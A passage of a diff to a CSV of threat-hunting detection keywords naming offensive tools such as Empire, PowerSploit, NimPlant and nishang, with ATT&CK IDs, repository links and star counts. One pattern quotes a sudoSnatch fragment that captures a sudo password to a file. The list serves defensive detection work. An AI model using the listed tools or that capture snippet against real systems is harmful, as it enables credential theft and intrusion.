PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1057","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-UserPersistenceOption*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-UserPersistenceOption*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*New-VolumeShadowCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*New-WmiSession.ps1*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" "*Nexpose*","offensive_tool_keyword","rapid7","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://www.rapid7.com/products/nexpose/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nextnet.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" @@ -14058,9 +14219,9 @@ "*nheiniger/SnaffPoint*","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","0","N/A","7","2","191","19","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" "*Nick Swink aka c0rnbread*","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/layer8secure/SilentHound","1","0","N/A","N/A","5","430","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" "*nickvourd/COM-Hunter*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" -"*nickvourd/Supernova*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z" -"*nIFS=* read -s pass\necho -e *User=*$(whoami)*Password=*$pass*> /var/tmp*","offensive_tool_keyword","sudoSnatch","sudoSnatch payload grabs sudo password in plain text and imediately after target uses sudo command and sends it back to attacker remotely/locally.","T1552.001 - T1056.001 - T1071.001","TA0006 - TA0004 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SudoSnatch","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*Nightmangle-master*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","10","10","72","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" +"*nickvourd/Supernova*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*nIFS=* read -s pass\necho -e *User=*$(whoami)*Password=*$pass*> /var/tmp*","offensive_tool_keyword","sudoSnatch","sudoSnatch payload grabs sudo password in plain text and imediately after target uses sudo command and sends it back to attacker remotely/locally.","T1552.001 - T1056.001 - T1071.001","TA0006 - TA0004 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SudoSnatch","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*Nightmangle-master*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" "*nikto/program*","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" "*NimBlackout*.exe*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" "*NimBlackout.*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" @@ -14078,46 +14239,48 @@ "*nimcrypt.nim*","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","7","651","113","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" "*NimExec.exe*","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","4","307","33","2023-06-23T11:07:20Z","2023-04-21T19:46:53Z" "*NimExec-master*","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","4","307","33","2023-06-23T11:07:20Z","2023-04-21T19:46:53Z" -"*NimPlant v*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*nimplant-*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*NimPlant*.tar.gz*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*NimPlant*.zip*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*nimplant.db*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*NimPlant.dll*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*NimPlant.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*NimPlant.nimble*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*NimPlant.py*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*nimplantPrint*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*nimplants-*.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*nimplants.html*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*NimPlant v*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*nimplant-*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*NimPlant*.tar.gz*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*NimPlant*.zip*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*nimplant.db*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*NimPlant.dll*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*NimPlant.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*NimPlant.nimble*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*NimPlant.py*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*nimplantPrint*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*nimplants-*.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*nimplants.html*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*NimShellCodeLoader*","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","555","105","2023-08-26T12:48:08Z","2021-01-19T15:57:01Z" "*NimSyscallLoader -*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "*Ninja c2*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*ninjac2*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*nipe.pl *","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway. Tor enables users to surf the internet. chat and send instant messages anonymously. and is used by a wide variety of people for both licit and illicit purposes. Tor has. for example. been used by criminals enterprises. hacktivism groups. and law enforcement agencies at cross purposes. sometimes simultaneously. Nipe is a script to make the Tor network your default gateway.This Perl script enables you to directly route all your traffic from your computer to the Tor network through which you can surf the internet anonymously without having to worry about being tracked or traced back.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","0","N/A","N/A","10","1692","315","2023-09-22T12:35:29Z","2015-09-07T18:47:10Z" -"*nishang.exe*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*nishang.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*nishang.psm1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*nishang.exe*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*nishang.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*nishang.psm1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*NixImports by dr4k0nia*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","0","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*NixImports.csproj*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*NixImports.exe*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*NixImports.git*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*NixImports.sln*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" -"*nmake inject_local *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*nmake inject_local *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" "*nmap/ncrack*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" -"*nmap_smb_scan_custom_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*nmapAnswerMachine.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*nmap_port_scanner.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*nmap_port_scanner_ip_obj.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*nmap_smb_scan_custom_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*nmapAnswerMachine.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*nmap-reverse-lookup*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4pz*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","0","N/A","10","10","4","2","2023-10-02T19:54:24Z","2023-04-28T01:58:18Z" -"*no Mimik@tz - loaded 